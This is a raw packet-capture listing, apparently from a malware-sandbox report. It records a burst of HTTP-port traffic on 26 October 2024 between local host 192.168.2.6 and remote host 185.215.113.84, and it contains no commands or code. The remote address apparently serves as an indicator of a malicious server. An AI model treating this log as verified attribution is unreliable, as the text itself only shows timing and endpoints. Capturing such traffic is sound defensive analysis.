                                                                                                                                                                                            Oct 26, 2024 07:27:11.351691961 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351697922 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351710081 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351716042 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351728916 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351730108 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351746082 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351763010 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351768017 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351777077 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351784945 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351794004 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351804972 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351810932 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351818085 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351828098 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351834059 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351844072 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351850986 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351861954 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351866961 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351878881 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351882935 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351892948 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351902962 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351914883 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351919889 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351937056 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351957083 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.351980925 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352047920 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352062941 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352085114 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352097988 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352102041 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352113008 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352132082 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352132082 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352138042 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352145910 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352154016 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352169037 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352185011 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352191925 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352200985 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352207899 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352216959 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352225065 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352241039 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352241039 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352255106 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352263927 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352272987 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352277994 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352293968 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352297068 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352304935 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352309942 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352332115 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352334023 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352349043 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352349997 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352374077 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352382898 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352391005 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352405071 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352413893 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352422953 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352435112 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352438927 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352447033 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352454901 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352466106 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352472067 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352478981 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352497101 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352509022 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352530003 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352546930 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352567911 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352571011 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352580070 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352586985 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352606058 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352624893 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352648020 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352689028 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352705002 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352720022 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352735043 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352744102 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352756023 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352760077 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352775097 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352777004 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352791071 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352793932 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352806091 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352814913 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352827072 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352844000 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352879047 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352914095 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352917910 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352935076 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352956057 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.352967024 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402411938 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402453899 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402471066 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402543068 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402566910 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402576923 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402585983 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402604103 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402610064 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402616978 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402622938 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402633905 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.402657032 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433656931 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433690071 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433713913 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433728933 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433731079 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433742046 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433747053 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433763981 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433764935 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433782101 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433789015 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433804035 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433815002 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.433849096 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434067011 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434078932 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434117079 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434117079 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434140921 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434143066 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434159040 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434159994 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434182882 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434191942 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434197903 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434207916 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434231043 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434235096 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434238911 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434248924 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434264898 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434284925 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434290886 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434322119 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434322119 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434361935 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434376955 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434391975 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434407949 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434416056 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434422016 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434441090 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434453964 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434457064 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434482098 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434521914 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434555054 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434608936 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434624910 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434640884 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434648991 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434657097 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434674978 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434680939 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434695005 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434700012 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434710026 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434722900 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434750080 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434757948 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434776068 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434791088 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434797049 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434818983 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434834957 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434880972 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434902906 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434935093 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434941053 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434952974 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434969902 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.434993982 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435010910 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435029984 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435053110 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435076952 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435077906 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435087919 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435095072 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435112953 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435128927 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435133934 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435149908 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435158014 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435203075 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435241938 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435275078 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435298920 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435326099 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435328960 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435337067 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435348034 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435358047 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435369015 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435380936 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435389042 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435400009 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435411930 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435417891 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435441017 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435444117 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435461044 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435461044 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435477018 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435492039 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435501099 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435503960 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435518980 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435519934 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435534954 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435542107 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435558081 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435560942 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435568094 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435569048 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435586929 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435601950 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435607910 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435626984 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435628891 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435643911 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435653925 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435659885 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435662985 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435678005 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435686111 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435694933 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435707092 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435710907 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435714006 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435733080 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435739040 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435743093 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435772896 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435780048 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435802937 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435821056 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435861111 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435925007 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435940027 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435954094 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435964108 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.435981035 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436000109 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436158895 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436197042 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436269999 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436284065 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436300039 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436315060 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436316013 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436336040 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436345100 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436345100 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436352968 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436355114 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436368942 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436373949 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436388016 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436393976 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436403990 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436408043 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:11.436417103 CEST4999180192.168.2.6185.215.113.84
